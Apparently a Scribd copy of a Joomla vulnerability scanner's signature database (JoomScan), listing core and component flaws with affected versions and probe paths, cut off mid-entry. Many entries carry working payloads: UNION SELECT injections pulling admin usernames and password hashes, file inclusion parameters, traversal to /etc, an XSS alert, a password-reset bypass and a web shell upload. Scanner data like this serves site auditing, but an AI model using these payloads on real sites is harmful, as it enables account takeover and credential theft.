Scribd Logo
Upload

Welcome to Scribd!

  • Joomscandb

    Uploaded by

    Marcos Valle
    1K views38 pages
    Defenses implemented in.htaccess are not available, so exploiting is more likely to succeed. Core: JSession ssl session Disclosure Vulnerability Versions effected: 1.5. = /?1.5.8-x Some va lues were output from the database without being properly escaped.

    Original Description:

    Original Title

    joomscandb

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Defenses implemented in.htaccess are not available, so exploiting is more likely to succeed. Core: JSession ssl session Disclosure Vulnerability Versions effected: 1.5. = /?1.5.8-x Some va lues were output from the database without being properly escaped.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    1K views38 pages

    Joomscandb

    Uploaded by

    Marcos Valle
    Defenses implemented in.htaccess are not available, so exploiting is more likely to succeed. Core: JSession ssl session Disclosure Vulnerability Versions effected: 1.5. = /?1.5.8-x Some va lues were output from the database without being properly escaped.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 38

    Generic: htaccess.txt has not been renamed. Versions Affected: Any|/htaccess.txt |Generic defenses implemented in .

    htaccess are not available, so exploiting is m ore likely to succeed. Generic: Unprotected Administrator directory Versions Affected: Any|/admini strator/|The default /administrator directory is detected. Attackers can brutefo rce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20 TRICKY%20WAYS%20TO%20PROTECT.pdf Generic: Guessable Administrator directory Versions Affected: Any|/admin/|T he guessable /admin directory is detected. Attackers can bruteforce administrato r accounts. How to protect: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY %20WAYS%20TO%20PROTECT.pdf Core: Multiple XSS/CSRF Vulnerability Versions Affected: 1.5.9 <= |/?1.5.9-x|A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_ad min and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vu lnerabilities. Core: JSession SSL Session Disclosure Vulnerability Versions effected: Joomla! 1 .5.8 <= |/?1.5.8-x|When running a site under SSL (the entire site is forced to b e under ssl), Joomla! does not set the SSL flag on the cookie. This can allow s omeone monitoring the network to find the cookie related to the session. Core: Frontend XSS Vulnerability Versions effected: 1.5.10 <=|/?1.5.10-x|Some va lues were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin c an leverage it to gain access to super admin. Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1. 5.11 <=|/libraries/phpxmlrpc/xmlrpcs.php|/libraries/phpxmlrpc/xmlrpcs.php Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1. 5.12 <=|/libraries/joomla/utilities/compat/php50x.php|/libraries/joomla/utilitie s/compat/php50x.php Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability Versions e ffected: 1.5.11 <=|/?1.5.11-x-http_ref|An attacker can inject JavaScript or DHTM L code that will be executed in the context of targeted user browser, allowing t he attacker to steal cookies. HTTP_REFERER variable is not properly parsed. Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability Versions effe cted: 1.5.11 <=|/?1.5.11-x-php-s3lf|An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser. Core: Authentication Bypass Vulnerability Versions effected: Joomla! 1.5.3 <=|/ administrator/|Backend accepts any password for custom Super Administrator when LDAP enabled Core: Path Disclosure Vulnerability Versions effected: Joomla! 1.5.3 <=|/?1.5.3 -path-disclose|Crafted URL can disclose absolute path Core: User redirected Spamming Vulnerability Versions effected: Joomla! 1.5.3 < =|/?1.5.3-spam|User redirect spam Core: joomla.php RFI Vulnerability Versions effected: 1.0.0 |/includes/joomla. php|/includes/joomla.php?includepath= Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: 1.0.13 <=|/administrator/|It requires an administrator to be logged in and to be tricked into a specially crafted webpage. Core: Admin Backend Session Fixation SQL Injection Vulnerability Versions effect ed: Joomla! 1.0.12 <=|/?j1012-fixate-session|It is possible to manipulate admini strator interface cookies, which may be used to impersonate a legitimate user, a llowing the attacker to view or alter user records, and to perform transactions as that user. The Cookie variable can be set to a malicious and arbitrary value which can lead to session hijacking and privilege escalation attack. Core: Path Disclosure Vulnerability Versions effected: Joomla! 1.5.12 <=|/libra ries/joomla/utilities/compat/php50x.php|/libraries/joomla/utilities/compat/php50 x.php CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulner ability Versions effected: Joomla! 1.5.8 <=|/plugins/editors/xstandard/attachme ntlibrary.php|Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/e

    ditors/xstandard/attachmentlibrary.php CoreLibrary: g_pcltar_lib_dir Remote File Inclusion Vulnerability Versions effec ted: Joomla! 1.5.0 Beta|/libraries/pcl/pcltar.php|/libraries/pcl/pcltar.php?g_pc ltar_lib_dir= CoreTemplate: ja_purity XSS Vulnerability Versions effected: 1.5.10 <=|/templat es/ja_purity/|A XSS vulnerability exists in the JA_Purity template which ships w ith Joomla! 1.5. CoreLibrary: phpmailer Remote Code Execution Vulnerability Versions effected: Jo omla! 1.5.0 Beta/Stable|/libraries/phpmailer/phpmailer.php|N/A CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities Versions effected : Joomla! 1.5.12 |/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser /|While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296 CoreComponent: Joomla Remote Admin Password Change Vulnerability Versions Affe cted: 1.5.5 <= |/components/com_user/controller.php|1. Go to url : target.com/in dex.php?option=com_user&view=reset&layout=confirm 2. Write into field "token" c har ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/ administrator/ 5. Login admin with new password CoreComponent: com_content SQL Injection Vulnerability Version Affected: Joo mla! 1.0.0 <= |/components/com_content/|/index.php?option=com_content&task=blog category&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x 1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d6 96e6973747261746f72-CoreComponent: com_search Remote Code Execution Vulnerability Version Affected : Joomla! 1.5.0 beta 2 <= |/components/com_search/|/index.php?option=com_search &Itemid=1&searchword=%22%3Becho%20md5(911)%3B CoreComponent: com_admin File Inclusion Vulnerability Versions Affected: N/A|/components/com_admin/admin.admin.html.php|/components/com_admin/admin.admin .html.php?mosConfig_absolute_path= CoreComponent: com_admin File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_admin/admin.admin.html.php|/administrator/comp onents/com_admin/admin.admin.html.php?mosConfig_absolute_path= CoreComponent: MailTo SQL Injection Vulnerability Versions effected: N/A|/compon ents/com_mailto/|/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2 +union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0 x53757065722041646d696e6973747261746f72--&Itemid=1 CoreComponent: com_content Blind SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 RC3|/components/com_content/|/index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28 CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5. 7 <= |/components/com_content/|The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration. CoreComponent: com_weblinks XSS Vulnerability Version Affected: Joomla! 1. 5.7 <= |/components/com_weblinks/|[Requires valid user account] com_weblinks a llows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms). CoreComponent: com_mailto Email Spam Vulnerability Version Affected: Joomla! 1.5.6 <= |/components/com_mailto/|The mailto component does not verify validit y of the URL prior to sending. CoreComponent: com_content view=archive SQL Injection Vulnerability Versions e ffected: Joomla! 1.5.0 Beta1/Beta2/RC1|/components/com_content/|Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.9 <=| /components/com_content/|A XSS vulnerability exists in the category view of com_ content. CoreComponent: com_users XSS Vulnerability Version Affected: Joomla! 1.5.10 <=|/ components/com_users/|A XSS vulnerability exists in the user view of com_users i n the administrator panel.

    CoreComponent: com_installer CSRF Vulnerability Versions effected: Joomla! 1.5. 0 Beta|/administrator/components/com_installer|N/A CoreComponent: com_search Memory Comsumption DoS Vulnerability Versions effecte d: Joomla! 1.5.0 Beta|/components/com_search/|N/A CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability Versions effected: 1.0.7 <=|/components/com_poll/|Send request /index.php?option=com_po ll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><> CoreComponent: com_banners Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_banners/|/index.php?option=com_banners&task=archivesection& id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1 '='2 CoreComponent: com_mailto timeout Vulnerability Versions effected: 1.5.13 <=|/c omponents/com_mailto/|[Requires a valid user account] In com_mailto, it was poss ible to bypass timeout protection against sending automated emails. Component: A6MamboCredits File Inclusion Vulnerability Versions Affected: Any |/components/com_a6mambocredits/|/components/com_a6mambocredits/admin.a6mambocre dits.php?mosConfig_absolute_path= Component: A6MamboHelpDesk File Inclusion Vulnerability Versions Affected: An y |/components/com_a6mambohelpdesk/|/components/com_a6mambohelpdesk/admin.a6mamb ohelpdesk.php?mosConfig_live_site= Component: Advanced Poll Versions Affected: 2.2.0 <= |/components/com_a dvancedpoll/|N/A Component: Akocomment SQL Injection Vulnerability Versions Affected: Any |/com ponents/com_akocomment/|Akocomment allows users to post comments to articles. $a cname and $contentid are not sanitized and vulnerable. These correspond to hidde n, value-prefilled FORM variables in the akocomment created html form. Component: Article File Inclusion Vulnerability Versions Affected: 1.1 < = |/components/com_articles/|/classes/html/com_articles.php?absolute_path= Component: ArtLinks File Inclusion Vulnerability Versions Affected: Any|/comp onents/com_artlinks/|/components/com_artlinks/artlinks.dispnew.php?mosConfig_abs olute_path= Component: MamCom (com_trade) Versions Affected: Any |/components/com_trade/| N/A Component: Bayesian Naive Filter File Inclusion Vulnerability Versions A ffected: 1.1 <= |/components/com_bayesiannaivefilter/|/components/com_bayesianna ivefilter/lang.php?mosConfig_absolute_path= Component: BigApe Backup File Inclusion Vulnerability Versions Affected: <= |/components/com_babackup/|/components/com_babackup/classes/Tar.php?mosConfig_a bsolute_path= Component: BSQ Site Stats XSS + SQL Injection Vulnerabilities Versions Affect ed: 2.2.1 <= |/components/com_bsqsitestats/|1) Input passed via the "HTTP Refere r" Header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrative us er's browser session in context of an affected site when the site statistics are viewed. 2) Input passed via the URI string is not properly sanitised before be ing used in SQL queries. This can be exploited to manipulate SQL queries by inje cting arbitrary SQL code. Successful exploitation requires that "magic_quotes_g pc" is disabled. Component: Car Manager SQL Injection Vulnerability Versions Affected: 1.1 <= |/components/com_resman/|/index.php?option=com_resman&task=moreinfo&id=-1+UNION +SELECT+111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),333+FROM +jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Classifieds Versions Affected: 1.3 <= |/components/com_classifieds/| N/A Component: Colophon File Inclusion Vulnerability Versions Affected: 1.2 <= | /components/com_colophon/|/components/com_colophon/admin.colophon.php?mosConfig_ absolute_path= Component: Community Builder SQL Injection Vulnerability Versions Affected: 1. 0.0 <= |/components/com_profiler/|/index.php?option=com_profile&Itemid=42&task=& task=viewoffer&oid=9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,

    0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e697374 7261746f72-Component: Events Versions Affected: 1.3 Beta <= |/components/com_events /|N/A Component: Expose Flash Gallery Remote Permission Bypass/Arbitrary File Upload Vulnerability Versions Affected: RC4 <= |/components/com_expose/uploadimg.php|Up load shell.php.jpg to /components/com_expose/uploadimg.php or /administrator/com _expose/uploadimg.php. Check your shell at /components/com_expose/expose/img/she ll.php.jpg or /administrator/... Component: ExtCalendar XSS Vulnerability Versions Affected: 0.9.1 <= |/co mponents/com_extcalendar/|1) Input passed to the "month", "year", "prev", and "n ext" parameters in calendar.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 2) Input passed to the "Event title" field when adding a new event isn't properly sanitised before bei ng used. This can be exploited to inject arbitrary HTML and script code, which w ill be executed in a user's browser session in context of an affected site when the malicious user data is viewed (e.g. when the administrator logs in). Component: Facile Forms SQL Injection Vulnerability Versions Affected: 1.4.6 <= |/components/com_facileforms/|/index.php?option=com_facileforms&Itemid=640&user _id=107&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a ,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261 746f72-Component: Galleria File Inclusion Vulnerability Versions Affected: Any |/ components/com_galleria/galleria.html.php|/components/com_galleria/galleria.html .php?mosConfig_absolute_path= Component: Gmaps SQL Injection Vulnerability Versions Affected: 1.01 <= |/ components/com_gmaps/|/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3 ,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f7 2-Component: Hash Cash File Inclusion Vulnerability Versions Affected: Any |/co mponents/com_hashcash/server.php|/components/com_hashcash/server.php?mosConfig_a bsolute_path= Component: Hot Property Versions Affected: 0.97 <= |/components/com_hotproper ty/|N/A Component: JCE XSS+File Inclusion Vulnerability Versions Affected: 1.0.4 <= |/components/com_jce/|1) Input passed to the "img", "title", "w", and "h" par ameters within jce.php is not properly sanitised before being returned to the us er. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 2) Input passed to the "plugin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local r esources. Component: JoomlaPack File Inclusion Vulnerability Versions Affected: 1.0.4a2 RE <= |/components/com_jpack/|/components/com_jpack/includes/CAltInstall er.php?mosConfig_absolute_path= Component: JoomlaBoard File Inclusion Vulnerability Versions Affecte d: 1.1.1 <= |/components/com_joomlaboard/|/components/com_joomlaboard/file_uploa d.php?sbp= Component: JoomlaLib Versions Affected: 1.2.1 <= |/components/com_joomlalib/| N/A Component: JD-WordPress Versions Affected: 1.0 RC2 <= |/components/com_j d-wp/|N/A Component: Fundraiser Versions Affected: 0.0.0 <= |/components/com_fundraiser/ |N/A Component: Marketplace SQL Injection Vulnerability Versions Affected: 1.1.1 -pl1 <= |/components/com_marketplace/|/index.php?option=com_marketplace&page=sho w_category&catid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,us ertype,0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e697374726

    1746f72-Component: NeoReferences SQL Injection Vulnerability Versions Affected : 1.3.1 <= |/components/com_neoreferences/|/index.php?option=com_neoreferences&I temid=27&catid=99887766+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3 a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e697374726 1746f72+where+user_id=1=1-Component: CHRONOContact File Inclusion Vulnerability Versions Affected: N/A|/co mponents/com_chronocontact/excelwriter/PPS/File.php|/components/com_chronocontac t/excelwriter/PPS/File.php?mosConfig_absolute_path= Component: MamboSPGM Versions Affected: 1.4.1 <= |/components/com_mambospgm/| N/A Component: Ajax Chat Versions Affected: 1.0.1 <= |/components/com_ajaxchat/|N /A Component: Joomla Cloner Versions Affected: 1.6.1 <= |/components/com_cloner/| N/A Component: Quiz SQL Injection Vulnerability Versions Affected: 0.81 <= |/com ponents/com_quiz/|/index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1+U NION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM +jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: MCQuiz SQL Injection Vulnerability Versions Affected: 0.9 < = |/components/com_mcquiz/|/index.php?option=com_mcquiz&task=user_tst_shw&Itemid =42&tid=1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0 x1e),0x3a+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72 -Component: paxxgallery Blind SQL Injection Vulnerability Versions Affected: 0.2 <= |/components/com_paxxgallery/|/index.php?option=com_paxxgallery&Itemid=85 &gid=7&userid=1&task=view&iid=1+and+1=1::/index.php?option=com_paxxgallery&Itemi d=85&gid=7&userid=1&task=view&iid=1+and+1=2 Component: pcchess File Inclusion Vulnerability Versions Affected: 0.8 < = |/components/com_pcchess/include.pcchess.php|/components/com_pcchess/include.p cchess.php?mosConfig_absolute_path= Component: xfaq SQL Injection Vulnerability Versions Affected: 1.2 <= |/ components/com_xfaq/|/index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&a id=-9988+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e ),1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0+FROM+jos_users+where+usertype=0x53757065 722041646d696e6973747261746f72-Component: rapidrecipe SQL injection Vulnerability Versions Affected: 1.6.5 <= |/components/com_rapidrecipe/|/index.php?option=com_rapidrecipe&page=viewrec ipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user( ),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos _users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_doc SQL Injection Vulnerability Versions Affected: Any ]|/compon ents/com_doc/|/index.php?option=com_doc&task=view&sid=-1+UNION+SELECT+1,1,2,conc at(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a,5,6,7,8,password,us ername,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72 -Component: Unknown name: com_noticias SQL Injection Vulnerability Versions Affected: Any |/components/com_noticias/|index.php?option=com_noticias&Itemid=x corpitx&task=detalhe&id=-99887766+UNION++SELECT+0,concat(username,0x3a,password, 0x3a,email),2,3,4,5++FROM++jos_users+where+usertype=0x53757065722041646d696e6973 747261746f72-Component: NeoGallery SQL Injection Vulnerability Versions Affected: Any | /components/com_neogallery/|/index.php?option=com_neogallery&task=show&Itemid=5& catid=999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype, 0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72 -Component: Ynews SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_ynews/|/index.php?option=com_ynews&Itemid=0&task=showYNews& id=-1+UNION+SELECT+0,1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype ,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f7

    2-Component: jooget SQL Injection Vulnerability Versions Affected: 2.6.8 <= |/components/com_jooget/|/index.php?option=com_jooget&Itemid=61&task=detail& id=-1+UNION+SELECT+0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2, 2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+whe re+usertype=0x53757065722041646d696e6973747261746f72-Component: MediaSlide Blind SQL Injection Vulnerability Versions Affected: 0.5.0 <= |/components/com_mediaslide/|/index.php?option=com_mediaslide&act=contact&id =1&albumnum=1+and+1=1::/index.php?option=com_mediaslide&act=contact&id=1&albumnu m=1+and+1=2 Component: Rssxt RFI Vulnerability Versions Affected: 1.0 <= |/components/com_r ssxt/|/components/com_rssxt/rssxt.php?mosConfig_absolute_path= Component: D4JeZine Versions Affected: 2.8 <= |/components/com_ezine/|N/A Component: ProductShowcase SQL Injection Vulnerability Versions Affected: 1.5 <= |/components/com_productshowcase/|/index.php?option=com_productshowcase&Itemid= 1&action=details&id=-99999+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1 e,0x3a,usertype,0x1e),concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e ),0,0,0,0,0,1,1,1,1,2,3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d69 6e6973747261746f72-Component: Candle SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_candle/|/index.php?option=com_candle&task=content&cID=-9999+UN ION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6 +FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: simple shop SQL Injection Vulnerability Versions Affected: 2.0 <= |/ components/com_simpleshop/|/index.php?option=com_simpleshop&task=browse&Itemid=2 9&catid=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype, 0x1e),1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e69737472 61746f72-Component: hwdVideoShare SQL Injection Vulnerability Versions Affected: 1.1.1 <= |/components/com_hwdvideoshare/|/index.php?option=com_hwdvideoshare&func=viewca tegory&Itemid=61&cat_id=-9999999+UNION+SELECT+000,111,222,333,concat(0x1e,userna me,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2+FR OM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Clasifier SQL Injection Vulnerability Versions Affected: 0.9 <= |/co mponents/com_clasifier/|/index.php?option=com_clasifier&Itemid=61&cat_id=-999999 9+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+ jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: PC CookBook SQL Injection Vulnerability Versions Affected: 1.3 < = |/components/com_pccookbook/|/index.php?option=com_pccookbook&page=viewuserrec ipes&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a, usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e69737472617 46f72-Component: astatsPRO SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_astatspro/|/components/com_astatspro/refer.php?id=-1+UNION+ SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+wher e+usertype=0x53757065722041646d696e6973747261746f72-Component: com_galeria SQL Injection Vulnerability Versions Affected: Any|/ components/com_galeria/|/index.php?option=com_galeria&Itemid=61&func=detail&id=999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x 1e),111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,7+FROM+jos_users+where+usertyp e=0x53757065722041646d696e6973747261746f72-Component: Limbo File Manager com_fm RFI Vulnerability Versions Affected: 1.0.4 <= |/components/com_fm/fm.install.php|/components/com_fm/fm.install.php?lm_abso lute_path= Component: Serverstat File Inclusion Vulnerability Versions Affected: 0.4. 4 <= |/components/com_serverstat/install.serverstat.php|/components/com_serverst at/install.serverstat.php?mosConfig_absolute_path= Component: Com Profiler Blind SQL Injection Vulnerability Versions Affected: 1.0 RC2 <=|/components/com_comprofiler/|/index.php?option=com_comprofiler&task= userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&u

    ser=1+and+1=2 Component: Crop Image File Inclusion Vulnerability Versions Affected: 1.0 < = |/components/com_cropimage/admin.cropcanvas.php|/components/com_cropimage/admi n.cropcanvas.php?cropimagedir= Component: Mambatstaff File Inclusion Vulnerability Versions Affected: 3.1b <= |/components/com_mambatstaff/mambatstaff.php|/components/com_mambatstaff/mam batstaff.php?mosConfig_absolute_path= Component: Loudmouth Versions Affected: 4.0 j <= |/components/com_loudmouth/| N/A Component: PhpBB RFI Vulnerability Versions Affected: 1.2.4RC3 <= |/components/c om_forum/|/components/com_forum/download.php?phpbb_root_path= Component: Kochsuite File Inclusion Vulnerability Versions Affecte d: 0.9.4 <= |/components/com_kochsuite /|/components/com_kochsuite/config.kochsu ite.php?mosConfig_absolute_path= Component: Remository File Inclusion Vulnerability Versions Affecte d: 3.25 <= |/components/com_remository/admin.remository.php|/components/com_remo sitory/admin.remository.php?mosConfig_absolute_path= Component: Tosmo Mambo RFI Vulnerability Versions Affected: 4.0.13a <= |/compone nts/com_minibb/|/components/minibb/index.php?absolute_path= Component: Mam - Moodle File Inclusion Vulnerability Versions Affect ed: Any|/components/com_moodle/moodle.php|/components/com_moodle/moodle.php?mosC onfig_absolute_path= Component: Coppermine Photo Gallery File Inclusion Vulnerability Version s Affected: 1.0 <= |/components/com_cpg/cpg.php|/components/com_cpg/cpg.php?mosC onfig_absolute_path= Component: Php Shop File Inclusion Vulnerability Versions Affected: 1.2 RC2b <= |/components/com_phpshop/toolbar.phpshop.html.php|/components/com_phpsho p/toolbar.phpshop.html.php?mosConfig_absolute_path= Component: MamboWiki File Inclusion Vulnerability Versions Affected: 0.9.6 <= |/components/com_mambowiki/MamboLogin.php|/components/com_mambowiki/MamboLog in.php?IP= Component: Lurm Constructor File Inclusion Vulnerability Versions Affecte d: 0.6b <= |/components/com_lurm_constructor/admin.lurm_constructor.php|/compone nts/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= Component: FlippingBook SQL Injection Vulnerability Versions Affected: 1.0.4 <= |/components/com_flippingbook/|/index.php?option=com_flippingbook&Itemid=28&book _id=999+UNION+SELECT+null,concat(username,0x3e,password),null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+whe re+usertype=0x53757065722041646d696e6973747261746f72-Component: eXtplorer Local Directory Traversal Vulnerability Versions Affected: 2.0.0 RC2 <= |/components/com_extplorer/|/index.php?com_extplorer-test1 Component: joomlaXplorer Local Directory Traversal Vulnerability Versions Affec ted: 1.6.2 <= |/components/com_joomlaxplorer/|/index.php?option=com_joomlaxplore r&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc Component: joomlaXplorer XSS Vulnerability Versions Affected: 1.6.2 <= |/compone nts/com_joomlaxplorer/|/index.php?option=com_joomlaxplorer&action=show_error&dir =hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E Component: Online FlashQuiz Remote File Inclusion Vulnerability Versions Affec ted: 1.0.2 <= |/components/com_onlineflashquiz/|/component/com_onlineflashquiz/q uiz/common/db_config.inc.php?base_dir= Component: actualite SQL Injection Vulnerability Versions Affected: 1.0 <= |/components/com_actualite/|/index.php?option=com_actualite&task=edit&id=-1+UNIO N+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7 ,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: myalbum SQL Injection Vulnerability Versions Affected: 1.0 <= |/comp onents/com_myalbum/|/index.php?option=com_myalbum&album=-1+UNION+SELECT+0,concat (0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3,4+FROM+jos_users+where +usertype=0x53757065722041646d696e6973747261746f72-Component: alphacontent SQL Injection Vulnerability Versions Affected: 2.5.8

    <= |/components/com_alphacontent/|/index.php?option=com_alphacontent&section=6& cat=15&task=view&id=-999999+UNION+SELECT+1,concat(username,0x3e,password),3,4,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,39+FROM+jos_us ers+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Cinema SQL Injection Vulnerability Versions Affected: 1.0 <= |/comp onents/com_cinema/|/index.php?option=com_cinema&Itemid=1&func=detail&id=-99999+U NION+SELECT+0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,29,29,30,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FR OM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: D3000 SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_d3000/|/index.php?option=com_d3000&task=showarticles&id=-99999 +UNION+SELECT+0,username,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0 x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: rekry SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_rekry/|/index.php?option=com_rekry&Itemid=60&rekryview=view&op_ id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+jos_users+where+usertype=0x537570657 22041646d696e6973747261746f72+limit+1,1-Component: custompages Remote File Inclusion Vulnerability Versions Affected: 1 .1 <= |/components/com_custompages/|/index.php?option=com_custompages&cpage= Component: Restaurante File Upload Vulnerability Versions Affected: 1.0 <= |/ components/com_restaurante/|/index.php?option=com_restaurante&task=detail&Itemid =1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2 ,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(0x1e,username,0x3a,password,0x1e ,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e69737 47261746f72-Component: Alberghi SQL Injection Vulnerability Versions Affected: 2.1.3 <= |/c omponents/com_alberghi/|/index.php?option=com_alberghi&task=detail&Itemid=1&id=99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2, 